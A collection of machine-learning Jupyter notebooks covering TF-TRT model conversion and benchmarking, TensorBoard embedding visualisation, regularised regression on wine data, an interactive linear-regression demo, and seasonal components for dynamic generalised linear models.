calibration_files = [os.path.join(path, name) for path, _, files in os.walk(data_directory) for name in files]
print('There are %d calibration files. \n%s\n%s\n...'%(len(calibration_files), calibration_files[0], calibration_files[-1]))
```
We define a helper function to read and preprocess image from JPEG file.
```
def parse_file(filepath):
image = tf.io.read_file(filepath)
image = tf.image.decode_jpeg(image, channels=3)
image = vgg_preprocessing(image, 224, 224)
return image
num_calibration_batches = 2
# prepare calibration dataset
dataset = tf.data.Dataset.from_tensor_slices(calibration_files)
dataset = dataset.map(map_func=parse_file, num_parallel_calls=20)
dataset = dataset.batch(batch_size=BATCH_SIZE)
dataset = dataset.repeat(None)
calibration_dataset = dataset.take(num_calibration_batches)
def calibration_input_fn():
for x in calibration_dataset:
yield (x, )
```
Next, we proceed with the two-stage process of creating and calibrating TFTRT INT8 model.
### Convert and calibrate the TF-TRT INT8 inference engine
```
# set a directory to write the saved model
INT8_SAVED_MODEL_DIR = SAVED_MODEL_DIR + "_TFTRT_INT8/2"
!rm -rf $INT8_SAVED_MODEL_DIR
conversion_params = trt.DEFAULT_TRT_CONVERSION_PARAMS._replace(
precision_mode=trt.TrtPrecisionMode.INT8)
converter = trt.TrtGraphConverterV2(
input_saved_model_dir=SAVED_MODEL_DIR,
conversion_params=conversion_params)
converter.convert(calibration_input_fn=calibration_input_fn)
converter.save(INT8_SAVED_MODEL_DIR)
```
As before, we can benchmark the speed and accuracy of the resulting model.
```
benchmark_saved_model(INT8_SAVED_MODEL_DIR)
```
## Conclusion
In this notebook, we have demonstrated the process of creating TF-TRT inference model from an original TF FP32 *saved model*. In every case, we have also verified the accuracy and speed to the resulting model.
|
github_jupyter
|
nvidia-docker run --rm -it -p 8888:8888 -v /path/to/image_net:/data -v /path/to/saved_model:/saved_model --name TFTRT nvcr.io/nvidia/tensorflow:19.12-tf2-py3
jupyter notebook --ip 0.0.0.0 --port 8888 --allow-root
%%bash
pushd /workspace/nvidia-examples/tensorrt/tftrt/examples/object_detection/
bash ../helper_scripts/install_pycocotools.sh;
popd
import os
os.environ['CUDA_VISIBLE_DEVICES']='0'
import time
import logging
import numpy as np
import tensorflow as tf
print("TensorFlow version: ", tf.__version__)
from tensorflow.python.compiler.tensorrt import trt_convert as trt
from tensorflow.python.saved_model import tag_constants
logging.getLogger("tensorflow").setLevel(logging.ERROR)
# check TensorRT version
print("TensorRT version: ")
!dpkg -l | grep nvinfer
def get_files(data_dir, filename_pattern):
if data_dir == None:
return []
files = tf.io.gfile.glob(os.path.join(data_dir, filename_pattern))
if files == []:
raise ValueError('Can not find any files in {} with '
'pattern "{}"'.format(data_dir, filename_pattern))
return files
VALIDATION_DATA_DIR = "/data"
validation_files = get_files(VALIDATION_DATA_DIR, 'validation*')
print('There are %d validation files. \n%s\n%s\n...'%(len(validation_files), validation_files[0], validation_files[-1]))
%%bash
FILE=/saved_model/resnet_v1_50_2016_08_28.tar.gz
if [ -f $FILE ]; then
echo "The file '$FILE' exists."
else
echo "The file '$FILE' in not found. Downloading..."
wget -P /saved_model/ http://download.tensorflow.org/models/official/20181001_resnet/savedmodels/resnet_v1_fp32_savedmodel_NHWC.tar.gz
fi
tar -xzvf /saved_model/resnet_v1_fp32_savedmodel_NHWC.tar.gz -C /saved_model
def deserialize_image_record(record):
feature_map = {
'image/encoded': tf.io.FixedLenFeature([ ], tf.string, ''),
'image/class/label': tf.io.FixedLenFeature([1], tf.int64, -1),
'image/class/text': tf.io.FixedLenFeature([ ], tf.string, ''),
'image/object/bbox/xmin': tf.io.VarLenFeature(dtype=tf.float32),
'image/object/bbox/ymin': tf.io.VarLenFeature(dtype=tf.float32),
'image/object/bbox/xmax': tf.io.VarLenFeature(dtype=tf.float32),
'image/object/bbox/ymax': tf.io.VarLenFeature(dtype=tf.float32)
}
with tf.name_scope('deserialize_image_record'):
obj = tf.io.parse_single_example(record, feature_map)
imgdata = obj['image/encoded']
label = tf.cast(obj['image/class/label'], tf.int32)
bbox = tf.stack([obj['image/object/bbox/%s'%x].values
for x in ['ymin', 'xmin', 'ymax', 'xmax']])
bbox = tf.transpose(tf.expand_dims(bbox, 0), [0,2,1])
text = obj['image/class/text']
return imgdata, label, bbox, text
from preprocessing import vgg_preprocess as vgg_preprocessing
def preprocess(record):
# Parse TFRecord
imgdata, label, bbox, text = deserialize_image_record(record)
#label -= 1 # Change to 0-based if not using background class
try: image = tf.image.decode_jpeg(imgdata, channels=3, fancy_upscaling=False, dct_method='INTEGER_FAST')
except: image = tf.image.decode_png(imgdata, channels=3)
image = vgg_preprocessing(image, 224, 224)
return image, label
#Define some global variables
BATCH_SIZE = 64
SAVED_MODEL_DIR = "/saved_model/resnet_v1_fp32_savedmodel_NHWC/1538686669/"
!saved_model_cli show --all --dir $SAVED_MODEL_DIR
INPUT_TENSOR = 'input_tensor:0'
OUTPUT_TENSOR = 'softmax_tensor:0'
def benchmark_saved_model(SAVED_MODEL_DIR, BATCH_SIZE=64):
# load saved model
saved_model_loaded = tf.saved_model.load(SAVED_MODEL_DIR, tags=[tag_constants.SERVING])
signature_keys = list(saved_model_loaded.signatures.keys())
print(signature_keys)
infer = saved_model_loaded.signatures['serving_default']
print(infer.structured_outputs)
# prepare dataset iterator
dataset = tf.data.TFRecordDataset(validation_files)
dataset = dataset.map(map_func=preprocess, num_parallel_calls=20)
dataset = dataset.batch(batch_size=BATCH_SIZE, drop_remainder=True)
print('Warming up for 50 batches...')
cnt = 0
for x, y in dataset:
labeling = infer(x)
cnt += 1
if cnt == 50:
break
print('Benchmarking inference engine...')
num_hits = 0
num_predict = 0
start_time = time.time()
for x, y in dataset:
labeling = infer(x)
preds = labeling['classes'].numpy()
num_hits += np.sum(preds == y)
num_predict += preds.shape[0]
print('Accuracy: %.2f%%'%(100*num_hits/num_predict))
print('Inference speed: %.2f samples/s'%(num_predict/(time.time()-start_time)))
benchmark_saved_model(SAVED_MODEL_DIR, BATCH_SIZE=BATCH_SIZE)
FP32_SAVED_MODEL_DIR = SAVED_MODEL_DIR+"_TFTRT_FP32/1"
!rm -rf $FP32_SAVED_MODEL_DIR
conversion_params = trt.DEFAULT_TRT_CONVERSION_PARAMS._replace(
precision_mode=trt.TrtPrecisionMode.FP32)
converter = trt.TrtGraphConverterV2(
input_saved_model_dir=SAVED_MODEL_DIR,
conversion_params=conversion_params)
converter.convert()
converter.save(FP32_SAVED_MODEL_DIR)
benchmark_saved_model(FP32_SAVED_MODEL_DIR, BATCH_SIZE=BATCH_SIZE)
FP16_SAVED_MODEL_DIR = SAVED_MODEL_DIR+"_TFTRT_FP16/1"
!rm -rf $FP16_SAVED_MODEL_DIR
conversion_params = trt.DEFAULT_TRT_CONVERSION_PARAMS._replace(
precision_mode=trt.TrtPrecisionMode.FP16)
converter = trt.TrtGraphConverterV2(
input_saved_model_dir=SAVED_MODEL_DIR,
conversion_params=conversion_params)
converter.convert()
converter.save(FP16_SAVED_MODEL_DIR)
benchmark_saved_model(FP16_SAVED_MODEL_DIR, BATCH_SIZE=BATCH_SIZE)
num_calibration_batches = 2
# prepare calibration dataset
dataset = tf.data.TFRecordDataset(validation_files)
dataset = dataset.map(map_func=preprocess, num_parallel_calls=20)
dataset = dataset.batch(batch_size=BATCH_SIZE, drop_remainder=True)
calibration_dataset = dataset.take(num_calibration_batches)
def calibration_input_fn():
for x, y in calibration_dataset:
yield (x, )
# set a directory to write the saved model
INT8_SAVED_MODEL_DIR = SAVED_MODEL_DIR + "_TFTRT_INT8/1"
!rm -rf $INT8_SAVED_MODEL_DIR
conversion_params = trt.DEFAULT_TRT_CONVERSION_PARAMS._replace(
precision_mode=trt.TrtPrecisionMode.INT8)
converter = trt.TrtGraphConverterV2(
input_saved_model_dir=SAVED_MODEL_DIR,
conversion_params=conversion_params)
converter.convert(calibration_input_fn=calibration_input_fn)
converter.save(INT8_SAVED_MODEL_DIR)
benchmark_saved_model(INT8_SAVED_MODEL_DIR, BATCH_SIZE=BATCH_SIZE)
!saved_model_cli show --all --dir $INT8_SAVED_MODEL_DIR
data_directory = "/data/Calibration_data"
calibration_files = [os.path.join(path, name) for path, _, files in os.walk(data_directory) for name in files]
print('There are %d calibration files. \n%s\n%s\n...'%(len(calibration_files), calibration_files[0], calibration_files[-1]))
def parse_file(filepath):
image = tf.io.read_file(filepath)
image = tf.image.decode_jpeg(image, channels=3)
image = vgg_preprocessing(image, 224, 224)
return image
num_calibration_batches = 2
# prepare calibration dataset
dataset = tf.data.Dataset.from_tensor_slices(calibration_files)
dataset = dataset.map(map_func=parse_file, num_parallel_calls=20)
dataset = dataset.batch(batch_size=BATCH_SIZE)
dataset = dataset.repeat(None)
calibration_dataset = dataset.take(num_calibration_batches)
def calibration_input_fn():
for x in calibration_dataset:
yield (x, )
# set a directory to write the saved model
INT8_SAVED_MODEL_DIR = SAVED_MODEL_DIR + "_TFTRT_INT8/2"
!rm -rf $INT8_SAVED_MODEL_DIR
conversion_params = trt.DEFAULT_TRT_CONVERSION_PARAMS._replace(
precision_mode=trt.TrtPrecisionMode.INT8)
converter = trt.TrtGraphConverterV2(
input_saved_model_dir=SAVED_MODEL_DIR,
conversion_params=conversion_params)
converter.convert(calibration_input_fn=calibration_input_fn)
converter.save(INT8_SAVED_MODEL_DIR)
benchmark_saved_model(INT8_SAVED_MODEL_DIR)
| 0.461745 | 0.963712 |
```
try:
# %tensorflow_version only exists in Colab.
%tensorflow_version 2.x
except Exception:
pass
%load_ext tensorboard
import os
import tensorflow as tf
import tensorflow_datasets as tfds
from tensorboard.plugins import projector
(train_data, test_data), info = tfds.load(
"imdb_reviews/subwords8k",
split=(tfds.Split.TRAIN, tfds.Split.TEST),
with_info=True,
as_supervised=True,
)
encoder = info.features["text"].encoder
# shuffle and pad the data.
train_batches = train_data.shuffle(1000).padded_batch(
10, padded_shapes=((None,), ())
)
test_batches = test_data.shuffle(1000).padded_batch(
10, padded_shapes=((None,), ())
)
train_batch, train_labels = next(iter(train_batches))
# Create an embedding layer
embedding_dim = 16
embedding = tf.keras.layers.Embedding(encoder.vocab_size, embedding_dim)
# Train this embedding as part of a keras model
model = tf.keras.Sequential(
[
embedding, # The embedding layer should be the first layer in a model.
tf.keras.layers.GlobalAveragePooling1D(),
tf.keras.layers.Dense(16, activation="relu"),
tf.keras.layers.Dense(1),
]
)
# Compile model
model.compile(
optimizer="adam",
loss=tf.keras.losses.BinaryCrossentropy(from_logits=True),
metrics=["accuracy"],
)
# Train model
history = model.fit(
train_batches, epochs=1, validation_data=test_batches, validation_steps=20
)
# Set up a logs directory, so Tensorboard knows where to look for files
log_dir='/tmp/logs/imdb-example/'
if not os.path.exists(log_dir):
os.makedirs(log_dir)
# Save Labels separately on a line-by-line manner.
with open(os.path.join(log_dir, 'metadata.tsv'), "w") as f:
for subwords in encoder.subwords:
f.write("{}\n".format(subwords))
# Fill in the rest of the labels with "unknown"
for unknown in range(1, encoder.vocab_size - len(encoder.subwords)):
f.write("unknown #{}\n".format(unknown))
# Save the weights we want to analyse as a variable. Note that the first
# value represents any unknown word, which is not in the metadata, so
# we will remove that value.
weights = tf.Variable(model.layers[0].get_weights()[0][1:])
# Create a checkpoint from embedding, the filename and key are
# name of the tensor.
checkpoint = tf.train.Checkpoint(embedding=weights)
checkpoint.save(os.path.join(log_dir, "embedding.ckpt"))
# Set up config
config = projector.ProjectorConfig()
embedding = config.embeddings.add()
# The name of the tensor will be suffixed by `/.ATTRIBUTES/VARIABLE_VALUE`
embedding.tensor_name = "embedding/.ATTRIBUTES/VARIABLE_VALUE"
embedding.metadata_path = 'metadata.tsv'
projector.visualize_embeddings(log_dir, config)
```
|
github_jupyter
|
try:
# %tensorflow_version only exists in Colab.
%tensorflow_version 2.x
except Exception:
pass
%load_ext tensorboard
import os
import tensorflow as tf
import tensorflow_datasets as tfds
from tensorboard.plugins import projector
(train_data, test_data), info = tfds.load(
"imdb_reviews/subwords8k",
split=(tfds.Split.TRAIN, tfds.Split.TEST),
with_info=True,
as_supervised=True,
)
encoder = info.features["text"].encoder
# shuffle and pad the data.
train_batches = train_data.shuffle(1000).padded_batch(
10, padded_shapes=((None,), ())
)
test_batches = test_data.shuffle(1000).padded_batch(
10, padded_shapes=((None,), ())
)
train_batch, train_labels = next(iter(train_batches))
# Create an embedding layer
embedding_dim = 16
embedding = tf.keras.layers.Embedding(encoder.vocab_size, embedding_dim)
# Train this embedding as part of a keras model
model = tf.keras.Sequential(
[
embedding, # The embedding layer should be the first layer in a model.
tf.keras.layers.GlobalAveragePooling1D(),
tf.keras.layers.Dense(16, activation="relu"),
tf.keras.layers.Dense(1),
]
)
# Compile model
model.compile(
optimizer="adam",
loss=tf.keras.losses.BinaryCrossentropy(from_logits=True),
metrics=["accuracy"],
)
# Train model
history = model.fit(
train_batches, epochs=1, validation_data=test_batches, validation_steps=20
)
# Set up a logs directory, so Tensorboard knows where to look for files
log_dir='/tmp/logs/imdb-example/'
if not os.path.exists(log_dir):
os.makedirs(log_dir)
# Save Labels separately on a line-by-line manner.
with open(os.path.join(log_dir, 'metadata.tsv'), "w") as f:
for subwords in encoder.subwords:
f.write("{}\n".format(subwords))
# Fill in the rest of the labels with "unknown"
for unknown in range(1, encoder.vocab_size - len(encoder.subwords)):
f.write("unknown #{}\n".format(unknown))
# Save the weights we want to analyse as a variable. Note that the first
# value represents any unknown word, which is not in the metadata, so
# we will remove that value.
weights = tf.Variable(model.layers[0].get_weights()[0][1:])
# Create a checkpoint from embedding, the filename and key are
# name of the tensor.
checkpoint = tf.train.Checkpoint(embedding=weights)
checkpoint.save(os.path.join(log_dir, "embedding.ckpt"))
# Set up config
config = projector.ProjectorConfig()
embedding = config.embeddings.add()
# The name of the tensor will be suffixed by `/.ATTRIBUTES/VARIABLE_VALUE`
embedding.tensor_name = "embedding/.ATTRIBUTES/VARIABLE_VALUE"
embedding.metadata_path = 'metadata.tsv'
projector.visualize_embeddings(log_dir, config)
| 0.704668 | 0.469763 |
```
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
import sklearn.cross_validation as cv
from sklearn import linear_model
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import cross_val_score
from sklearn.preprocessing import scale
from sklearn.linear_model import Lasso, LassoCV, Ridge, RidgeCV
from sklearn import cross_validation
from sklearn.metrics import mean_squared_error
%matplotlib inline
data = pd.read_csv("winequality-red.csv", sep=";")
intercept = np.ones((len(data),1))
data.insert(0, "intercept", intercept, allow_duplicates = False)
X= data.drop(columns = "quality")
y = data["quality"]
alphas = np.logspace(-4,-1,10)
lasso = Lasso(max_iter=10000, normalize=True)
coefs = []
for a in alphas:
lasso.set_params(alpha=a)
lasso.fit(X, y)
coefs.append(lasso.coef_)
ax = plt.gca()
ax.plot(alphas, coefs)
ax.set_xscale('log')
plt.axis('tight')
plt.xlabel('alpha')
plt.ylabel('weights')
```
#### Multiple linear regression
```
lin_reg = LinearRegression()
MSE = cross_val_score(lin_reg, X, y, scoring = "neg_mean_squared_error", cv = 5)
mean_MSE = np.mean(MSE)
print(mean_MSE)
```
#### Ridge Regression
```
from sklearn.model_selection import GridSearchCV
from sklearn.linear_model import Ridge
ridge = Ridge()
alphas = {"alpha": np.logspace(-4,-1,10)}
ridge_regressor = GridSearchCV(ridge, alphas, scoring="neg_mean_squared_error", cv = 5)
ridge_regressor.fit(X,y)
print(ridge_regressor.best_params_)
print(ridge_regressor.best_score_)
```
#### Lasso Regression
```
from sklearn.linear_model import Lasso
lasso = Lasso()
alphas = {"alpha": np.logspace(-4,-1,10)}
lasso_regressor = GridSearchCV(lasso, alphas, scoring = "neg_mean_squared_error", cv = 5)
lasso_regressor.fit(X,y)
print(lasso_regressor.best_params_)
print(lasso_regressor.best_score_)
X_train, X_test, y_train, y_test = cv.train_test_split(X, y, test_size=0.25, random_state=0)
alphas = np.logspace(-4,-1,10)
scores = np.empty_like(alphas)
for i, a in enumerate(alphas):
lasso = linear_model.Lasso()
lasso.set_params(alpha= a)
lasso.fit(X_train,y_train)
scores[i] = lasso.score(X_test,y_test)
print(a, lasso.coef_)
lassocv = linear_model.LassoCV()
lassocv.fit(X,y)
lassocv_score = lassocv.score(X, y)
lassocv_alpha = lassocv.alpha_
print('CV', lassocv.coef_)
plt.plot(alphas, scores, '-ko')
plt.axhline(lassocv_score, color='b', ls='--')
plt.axvline(lassocv_alpha, color='b', ls='--')
plt.xlabel(r'$\alpha$')
plt.ylabel('Score')
sns.despine(offset=15)
```
|
github_jupyter
|
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
import sklearn.cross_validation as cv
from sklearn import linear_model
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import cross_val_score
from sklearn.preprocessing import scale
from sklearn.linear_model import Lasso, LassoCV, Ridge, RidgeCV
from sklearn import cross_validation
from sklearn.metrics import mean_squared_error
%matplotlib inline
data = pd.read_csv("winequality-red.csv", sep=";")
intercept = np.ones((len(data),1))
data.insert(0, "intercept", intercept, allow_duplicates = False)
X= data.drop(columns = "quality")
y = data["quality"]
alphas = np.logspace(-4,-1,10)
lasso = Lasso(max_iter=10000, normalize=True)
coefs = []
for a in alphas:
lasso.set_params(alpha=a)
lasso.fit(X, y)
coefs.append(lasso.coef_)
ax = plt.gca()
ax.plot(alphas, coefs)
ax.set_xscale('log')
plt.axis('tight')
plt.xlabel('alpha')
plt.ylabel('weights')
lin_reg = LinearRegression()
MSE = cross_val_score(lin_reg, X, y, scoring = "neg_mean_squared_error", cv = 5)
mean_MSE = np.mean(MSE)
print(mean_MSE)
from sklearn.model_selection import GridSearchCV
from sklearn.linear_model import Ridge
ridge = Ridge()
alphas = {"alpha": np.logspace(-4,-1,10)}
ridge_regressor = GridSearchCV(ridge, alphas, scoring="neg_mean_squared_error", cv = 5)
ridge_regressor.fit(X,y)
print(ridge_regressor.best_params_)
print(ridge_regressor.best_score_)
from sklearn.linear_model import Lasso
lasso = Lasso()
alphas = {"alpha": np.logspace(-4,-1,10)}
lasso_regressor = GridSearchCV(lasso, alphas, scoring = "neg_mean_squared_error", cv = 5)
lasso_regressor.fit(X,y)
print(lasso_regressor.best_params_)
print(lasso_regressor.best_score_)
X_train, X_test, y_train, y_test = cv.train_test_split(X, y, test_size=0.25, random_state=0)
alphas = np.logspace(-4,-1,10)
scores = np.empty_like(alphas)
for i, a in enumerate(alphas):
lasso = linear_model.Lasso()
lasso.set_params(alpha= a)
lasso.fit(X_train,y_train)
scores[i] = lasso.score(X_test,y_test)
print(a, lasso.coef_)
lassocv = linear_model.LassoCV()
lassocv.fit(X,y)
lassocv_score = lassocv.score(X, y)
lassocv_alpha = lassocv.alpha_
print('CV', lassocv.coef_)
plt.plot(alphas, scores, '-ko')
plt.axhline(lassocv_score, color='b', ls='--')
plt.axvline(lassocv_alpha, color='b', ls='--')
plt.xlabel(r'$\alpha$')
plt.ylabel('Score')
sns.despine(offset=15)
| 0.721056 | 0.74911 |
# Linear Regression
Imports and Helper Functions
---
```
%matplotlib inline
from ipywidgets import interactive_output
import ipywidgets as widgets
import numpy as np
from matplotlib import pyplot as plt
```
## Data Set Generation
```
N = 100
datasets = {}
X = 20 * (np.random.rand(100, 1) - 0.5) # creates random values in [-10, 10) interval.
X[10] = 8
Y = 0.5 * X - 1.2 + np.random.randn(100, 1)
datasets["Linear"] = (X, Y)
Y = 0.1 * (X ** 2) + 0.5 * X - 2 + np.random.randn(100, 1)
datasets["Quadratic"] = (X, Y)
Y = 0.2 * (X ** 3) + 0.6 * (X ** 2) - 0.5 * X - 1 + np.random.randn(100, 1)
datasets["Cubic"] = (X, Y)
Y = 0.5 * X - 1.2 + np.random.randn(100, 1)
Y[10] = -8
datasets["Outlier"] = (X, Y)
```
## Define Prediction, Loss, and Learning Function
```
def predict(X, weight, bias):
#Compute Yhat given X and parameters
Yhat = weight * X + bias
return Yhat
def squared_loss(Y, Yhat):
#Compute the empirical risk given Y and Yhat
R = np.mean((Y - Yhat) ** 2)
return (R)
def fit(X, Y):
#Learn the model parameters
N = X.shape[0]
X = np.hstack((X, np.ones((N, 1)))) #Bias absorbtion!
theta = np.linalg.inv(X.T.dot(X)).dot(X.T).dot(Y)
weight = theta[0]
bias = theta[1]
return weight, bias
```
## Interaction Functions and UI
```
def plot_model(weight=0, bias=0, dataset=None, N=0, learn=False, show_residuals=False):
plt.figure(figsize=(10, 6))
plt.rcParams.update({'font.size': 12})
if dataset is not None and N > 0:
X, Y = datasets[dataset]
X = X[:N]
Y = Y[:N]
if N >= 2 and learn:
weight, bias = fit(X, Y)
Yhat = predict(X, weight, bias)
R = squared_loss(Y, Yhat)
plt.plot(X, Y, 'ko')
if show_residuals:
for n in range(N):
plt.plot([X[n], X[n]], [Y[n], Yhat[n]], 'k-', alpha=0.5)
else:
R = 0
xs = np.linspace(-10, 10, 200)
ys = xs * weight + bias
plt.plot(xs, ys, '-b')
plt.grid("True")
plt.xlim(-10, 10)
plt.ylim(-10, 10)
plt.title("weight: %.2f bias: %.2f Empirical Risk: %.2f" % (weight, bias, R))
plt.show()
ww = widgets.FloatSlider(value=0, min=-1, max=1, step=.1, description="Weight", continuous_update=False)
wb = widgets.FloatSlider(value=0, min=-10, max=10, step=.1, description="Bias", continuous_update=False)
wd = widgets.Dropdown(options=["Linear", "Quadratic","Cubic","Outlier"], description="Dataset")
wn = widgets.IntSlider(value=0, min=-1, max=N, step=1, description="N", continuous_update=False)
wl = widgets.Checkbox(value=False, description="Learn")
wr = widgets.Checkbox(value=False, description="Residuals")
out = interactive_output(
plot_model,
{"weight": ww, "bias": wb, "dataset": wd, "N": wn, "learn": wl, "show_residuals": wr}
)
out.layout.height = '400px'
box1 = widgets.HBox([ww, wb, wr])
box2 = widgets.HBox([wd, wn, wl])
ui = widgets.VBox([box1, box2])
```
## Linear Regression Demo
```
display(out, ui)
```
|
github_jupyter
|
%matplotlib inline
from ipywidgets import interactive_output
import ipywidgets as widgets
import numpy as np
from matplotlib import pyplot as plt
N = 100
datasets = {}
X = 20 * (np.random.rand(100, 1) - 0.5) # creates random values in [-10, 10) interval.
X[10] = 8
Y = 0.5 * X - 1.2 + np.random.randn(100, 1)
datasets["Linear"] = (X, Y)
Y = 0.1 * (X ** 2) + 0.5 * X - 2 + np.random.randn(100, 1)
datasets["Quadratic"] = (X, Y)
Y = 0.2 * (X ** 3) + 0.6 * (X ** 2) - 0.5 * X - 1 + np.random.randn(100, 1)
datasets["Cubic"] = (X, Y)
Y = 0.5 * X - 1.2 + np.random.randn(100, 1)
Y[10] = -8
datasets["Outlier"] = (X, Y)
def predict(X, weight, bias):
#Compute Yhat given X and parameters
Yhat = weight * X + bias
return Yhat
def squared_loss(Y, Yhat):
#Compute the empirical risk given Y and Yhat
R = np.mean((Y - Yhat) ** 2)
return (R)
def fit(X, Y):
#Learn the model parameters
N = X.shape[0]
X = np.hstack((X, np.ones((N, 1)))) #Bias absorbtion!
theta = np.linalg.inv(X.T.dot(X)).dot(X.T).dot(Y)
weight = theta[0]
bias = theta[1]
return weight, bias
def plot_model(weight=0, bias=0, dataset=None, N=0, learn=False, show_residuals=False):
plt.figure(figsize=(10, 6))
plt.rcParams.update({'font.size': 12})
if dataset is not None and N > 0:
X, Y = datasets[dataset]
X = X[:N]
Y = Y[:N]
if N >= 2 and learn:
weight, bias = fit(X, Y)
Yhat = predict(X, weight, bias)
R = squared_loss(Y, Yhat)
plt.plot(X, Y, 'ko')
if show_residuals:
for n in range(N):
plt.plot([X[n], X[n]], [Y[n], Yhat[n]], 'k-', alpha=0.5)
else:
R = 0
xs = np.linspace(-10, 10, 200)
ys = xs * weight + bias
plt.plot(xs, ys, '-b')
plt.grid("True")
plt.xlim(-10, 10)
plt.ylim(-10, 10)
plt.title("weight: %.2f bias: %.2f Empirical Risk: %.2f" % (weight, bias, R))
plt.show()
ww = widgets.FloatSlider(value=0, min=-1, max=1, step=.1, description="Weight", continuous_update=False)
wb = widgets.FloatSlider(value=0, min=-10, max=10, step=.1, description="Bias", continuous_update=False)
wd = widgets.Dropdown(options=["Linear", "Quadratic","Cubic","Outlier"], description="Dataset")
wn = widgets.IntSlider(value=0, min=-1, max=N, step=1, description="N", continuous_update=False)
wl = widgets.Checkbox(value=False, description="Learn")
wr = widgets.Checkbox(value=False, description="Residuals")
out = interactive_output(
plot_model,
{"weight": ww, "bias": wb, "dataset": wd, "N": wn, "learn": wl, "show_residuals": wr}
)
out.layout.height = '400px'
box1 = widgets.HBox([ww, wb, wr])
box2 = widgets.HBox([wd, wn, wl])
ui = widgets.VBox([box1, box2])
display(out, ui)
| 0.759047 | 0.975155 |
```
#hide
%load_ext autoreload
%autoreload 2
# default_exp seasonal
```
# Seasonal Components
> This module contains functions to define the seasonal components in a DGLM. These are *harmonic* seasonal components, meaning they are defined by sine and cosine functions with a specific period. For example, when working with daily time series we often use a weekly seasonal effect of period 7 or an annual seasonal effect of period 365.
```
#hide
#exporti
import numpy as np
from pybats_nbdev.forecast import forecast_aR, forecast_R_cov
```
## Seasonal Components for a DGLM
```
#export
def seascomp(period, harmComponents):
p = len(harmComponents)
n = 2*p
F = np.zeros([n, 1])
F[0:n:2] = 1
G = np.zeros([n, n])
for j in range(p):
c = np.cos(2*np.pi*harmComponents[j]/period)
s = np.sin(2*np.pi*harmComponents[j]/period)
idx = 2*j
G[idx:(idx+2), idx:(idx+2)] = np.array([[c, s],[-s, c]])
return [F, G]
```
This function is called from `dglm.__init__` to define the seasonal components.
```
#exporti
def createFourierToSeasonalL(period, harmComponents, Fseas, Gseas):
p = len(harmComponents)
L = np.zeros([period, 2*p])
L[0,:] = Fseas.reshape(-1)
for i in range(1, period):
L[i,:] = L[i-1,:] @ Gseas
return L
#export
def fourierToSeasonal(mod, comp=0):
phi = mod.L[comp] @ mod.m[mod.iseas[comp]]
var = mod.L[comp] @ mod.C[np.ix_(mod.iseas[comp], mod.iseas[comp])] @ mod.L[comp].T
return phi, var
```
This function transforms the seasonal component of a model from fourier form into more interpretable seasonal components. For example, if `seasPeriods = [7]`, then this would return a vector of length $7$, with each of the seasonal effects.
A simple use case is given below. For a more detailed use of this function, see the following [example](https://github.com/lavinei/pybats_nbdev/blob/master/examples/Poisson_DGLM_In_Depth_Example.ipynb).
```
import numpy as np
import pandas as pd
from pybats_nbdev.analysis import analysis
from pybats_nbdev.shared import load_sales_example2
data = load_sales_example2()
prior_length = 21 # Number of days of data used to set prior
mod = analysis(data.Sales.values, data[['Price', 'Promotion']].values, k=1,
family='poisson',
seasPeriods=[7], seasHarmComponents=[[1,2,3]],
prior_length=prior_length, dates=data.index,
ret = ['model'])
seas_mean, seas_cov = fourierToSeasonal(mod)
days = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']
lastday = data.index[-1]
days = [*days[lastday.isoweekday()-1:], *days[:lastday.isoweekday()-1]]
seas_eff = pd.DataFrame({'Day':days,
'Effect Mean':np.exp(seas_mean.reshape(-1))})
seas_eff
#exporti
def fourierToSeasonalFxnl(L, m, C, iseas):
phi = L @ m[iseas]
var = L @ C[np.ix_(iseas, iseas)] @ L.T
return phi, var
#exporti
def get_seasonal_effect_fxnl(L, m, C, iseas):
phi, var = fourierToSeasonalFxnl(L, m, C, iseas)
return phi[0], var[0, 0]
#exporti
def sample_seasonal_effect_fxnl(L, m, C, iseas, delVar, n, nsamps):
phi_samps = np.zeros([nsamps])
phi, var = fourierToSeasonalFxnl(L, m, C, iseas)
phi_samps[:] = phi[0] + np.sqrt(var[0,0])*np.random.standard_t(delVar*n, size = [nsamps])
return phi_samps
#exporti
def forecast_weekly_seasonal_factor(mod, k, sample = False, nsamps = 1):
a, R = forecast_aR(mod, k)
idx = np.where(np.array(mod.seasPeriods) == 7)[0][0]
if sample:
return sample_seasonal_effect_fxnl(mod.L[idx], a, R, mod.iseas[idx], mod.delVar, mod.n, nsamps)
else:
return get_seasonal_effect_fxnl(mod.L[idx], a, R, mod.iseas[idx])
#exporti
def forecast_path_weekly_seasonal_factor(mod, k, today, period):
phi_mu = [np.zeros([period]) for h in range(k)]
phi_sigma = [np.zeros([period, period]) for h in range(k)]
phi_psi = [np.zeros([period, period, h]) for h in range(1, k)]
idx = np.where(np.array(mod.seasPeriods) == 7)[0][0]
L = mod.L[idx]
iseas = mod.iseas[idx]
for h in range(k):
# Get the marginal a, R
a, R = forecast_aR(mod, h + 1)
m, v = get_seasonal_effect_fxnl(L, a, R, iseas)
day = (today + h) % period
phi_mu[h][day] = m
phi_sigma[h][day, day] = v
# phi_mu[h], phi_sigma[h] = get_latent_factor_fxnl_old((today + h) % period, mod.L, a, R, mod.iseas, mod.seasPeriods[0])
# Find covariances with previous latent factor values
for j in range(h):
# Covariance matrix between the state vector at times j, i, i > j
day_j = (today + j) % period
cov_jh = forecast_R_cov(mod, j, h)[np.ix_(iseas, iseas)]
phi_psi[h-1][day, day_j, j] = phi_psi[h-1][day_j, day, j] = (L @ cov_jh @ L.T)[day, day_j]
# cov_ij = (np.linalg.matrix_power(mod.G, h-j) @ Rlist[j])[np.ix_(mod.iseas, mod.iseas)]
return phi_mu, phi_sigma, phi_psi
#hide
from nbdev.export import notebook2script
notebook2script()
```
|
github_jupyter
|
#hide
%load_ext autoreload
%autoreload 2
# default_exp seasonal
#hide
#exporti
import numpy as np
from pybats_nbdev.forecast import forecast_aR, forecast_R_cov
#export
def seascomp(period, harmComponents):
p = len(harmComponents)
n = 2*p
F = np.zeros([n, 1])
F[0:n:2] = 1
G = np.zeros([n, n])
for j in range(p):
c = np.cos(2*np.pi*harmComponents[j]/period)
s = np.sin(2*np.pi*harmComponents[j]/period)
idx = 2*j
G[idx:(idx+2), idx:(idx+2)] = np.array([[c, s],[-s, c]])
return [F, G]
#exporti
